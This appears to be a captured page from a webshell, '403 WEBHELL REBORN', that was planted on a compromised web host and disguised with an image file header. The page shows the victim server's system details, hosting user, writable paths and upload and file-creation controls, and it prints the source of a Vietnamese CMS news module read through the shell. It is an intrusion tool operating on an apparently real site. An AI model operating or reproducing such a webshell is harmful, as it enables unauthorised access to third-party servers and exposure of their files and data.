ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/public_html/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/public_html//////modules/MI_TinNew.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
//*main.html BEGIN: Tin mới*// 
                $miNews_new = @mysql_query("SELECT c.*, p.*, c.id AS cid, p.id AS pid from cily_posts AS p
                                            JOIN cily_cats AS c
                                            ON p.post_cat = c.id  where c.cat_type = '1' AND c.cat_lang = ".$_SESSION['lang']." AND p.post_show= '10' order by p.id desc LIMIT 10");
		
                while ($miNewsnew = @mysql_fetch_array ($miNews_new)){

                    $w3c->assign(
                        array(
                            'miSkPID' => $miNewsnew['pid'],
                            'miSkCID' => $miNewsnew['cid'],
                            'miSkCAT_ascii' => $miNewsnew['cat_name_ascii'],
                            'miSkPs_ascii' => $miNewsnew['post_name_ascii'],
                            'miSkPs_name' => $miNewsnew['post_name'],
                            'miSkPs_quote' => catchuoi($miNewsnew['post_quote'],30),
                            'miSkPs_time' => formatTime($miNewsnew['post_time'],4),
                            'miSkPs_image' => $miNewsnew['post_image'],
							'miSkPs_imgfull' => str_replace('thumbs-','',$miNewsnew['post_image']),
                        ));
                    $w3c->parse('miNewsnew'); /*    {url}/bv/{miSkCAT_ascii}-c{miSkCID}/{miSkPs_ascii}-p{miSkPID}   */
                }
				
//*main.html END: Tin Tin mới *//

Anon7 - 2021